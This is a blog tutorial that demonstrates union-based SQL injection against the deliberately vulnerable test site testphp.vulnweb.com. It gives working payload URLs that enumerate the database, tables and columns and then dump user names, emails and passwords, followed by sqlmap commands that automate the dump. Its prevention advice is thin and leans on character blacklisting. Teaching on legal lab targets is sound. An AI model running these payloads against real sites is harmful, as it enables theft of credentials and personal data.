SQL injection attack is possible when a website exposes inputs to be taken from the user and uses the user input to directly run a query in MySQL. In this blog, I will be demonstrating how to perform a basic SQL Injection Attack on a website, and at the end, I will talk about a tool SQLmap , which automates the entire process.
If you don’t know what SQL Injection Attack is, you can visit this link. https://www.w3schools.com/sql/sql_injection.asp
There’s a website
http://testphp.vulnweb.com/listproducts.php?cat=1
which is open for testing php vulnerablities. I will be using this website to perform SQLi attack.
The most basic and simple way is to check the URLs of pages you are visiting. If the URL is something of the form http://testphp.vulnweb.com/listproducts.php?cat=1, it is a potential target. To check if the webpage is actually using a SQL backend, you can append \ or a single inverted quote ' at the end of URL and see if anything in the page breaks or you get an SQL error. For most cases the error is something like this:
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''a\'' at line 1
But the error can be anything else as well. For the website http://testphp.vulnweb.com/listproducts.php?cat=1 appending ' gives me the following screen
So I have established that SQL injection attack is possible on my target http://testphp.vulnweb.com/listproducts.php?cat=1
In the backend, the application might be running a query similar to
SELECT * FROM XYZ_TABLE WHERE CAT='<the value of id>'
The query executed for
http://testphp.vulnweb.com/listproducts.php?cat=1'
would be
SELECT * FROM XYZ_TABLE WHERE CAT=1'
And you guessed it right. This will throw an error.
The silver lining to this is now we know we can modify the query in any way we would like to. If I add --+ to the end, the query should run without errors. ( --+ or # will basically comment on anything written after it.This is a handy knowledge, though it may not be useful in this case)
The next step would be to find out the databases present. We make use of the ORDER BY clause here. If I run http://testphp.vulnweb.com/listproducts.php?cat=1 order by 5, the corresponding MySQL query would be
SELECT * FROM XYZ_TABLE WHERE CAT=1 order by 5--+'
This will sort the results on the basis of the 5th column.
I will repeat this process for different values of column numbers until I get a column number for which the page breaks. for eg. in this case when ORDER BY 12, the page breaks. I now know that the total number of columns is 11. Since the number of columns is 11, I will run a query select all 1,2,3,4,5,6,7,8,9,10,11.
http://testphp.vulnweb.com/listproducts.php?cat=1%20union%20select%20all%201,2,3,4,5,6,7,8,9,10,11
The corresponding MySQL query would look like
SELECT * FROM XYZ_TABLE WHERE CAT=1 union select all 1,2,3,4,5,6,7,8,9,10,11
Now navigate the webpage. In some places, you will find some of the numbers between 1 to 11. I see the numbers 7, 2 and 9.
I now know that anything I write in the place of 7, 2 and 9 will be visible. I want to kow the current database, user and version , so I execute
https://testphp.vulnweb.com/listproducts.php?cat=1%20union%20select%20all%201,user(),3,4,5,6,database(),8,version(),10,11
Note: %20 is ASCII for space
I replaced 2 with user(), 7 with database() and 9 with version().
I will get to know the datatbase, database version and the user details.
I get the following information:
acuartacuart@localhost8.0.22–0ubuntu0.20.04.2Once the above information is gathered, everything is going to be very simple. To get the list of tables, I will just run
http://testphp.vulnweb.com/listproducts.php?cat=1%20union%20select%20all%201,table_name,3,4,5,6,7,8,9,10,11%20from%20information_schema.tables%20where%20table_schema%20=%27acuart%27
Corresponding SQL Query:
SELECT * FROM XYZ_TABLE WHERE CAT=1 union select all 1,table_name,3,4,5,6,7,8,9,10,11 from information_schema.tables where table_schema = 'acuart'
information_schema is the default database which contains list of tables. We used this information to find out the table names. acuart is the database name we got from the previous step.
The webpage would look like:
We got a list of tables:
Discovering columns of the table users
http://testphp.vulnweb.com/listproducts.php?cat=1%20union%20select%20all%201,column_name,3,4,5,6,7,8,9,10,11%20from%20information_schema.columns%20where%20table_name=%27users%27
Corresponding SQL Query:
SELECT * FROM XYZ_TABLE WHERE CAT=1 union select all 1,column_name,3,4,5,6,7,8,9,10,11 from information_schema.columns where table_name = 'users'
I get the column names as :
To view name, email, password of users :
http://testphp.vulnweb.com/listproducts.php?cat=1%20union%20select%20all%201,name,3,4,5,6,email,8,pass,10,11%20from%20users
Corresponding SQL Query:
SELECT * FROM XYZ_TABLE WHERE CAT=1 union select all 1,name,3,4,5,6,email,8,pass,10,11 from users
If I wanted to use sqlmap to do the above, I would have to write the run the following commands on my terminal
sqlmap -u "https//testphp.vulnweb.com/listproducts.php?cat=1" --dbs to get list of databases
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --current-db : get current database
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --tables -D acuart : get list of tables in ‘acuart’
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --columns -T users -D acuart : get columns in the table ‘users’
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -T users -D acuart --dump : store all the data in the table usersSQL Injection attack is one of the most powerful attacks a hacker can perform. There are many ways SQL injection attacks can be prevented like blacklisting or whitelisting certain input characters. Programming frameworks also provide interfaces that allow inputs for only certain fields.
I am Gourav Dhar, a 2019 graduate from IIT Roorkee where I pursued my bachelors in Electronics and Communication Engineering.
Know More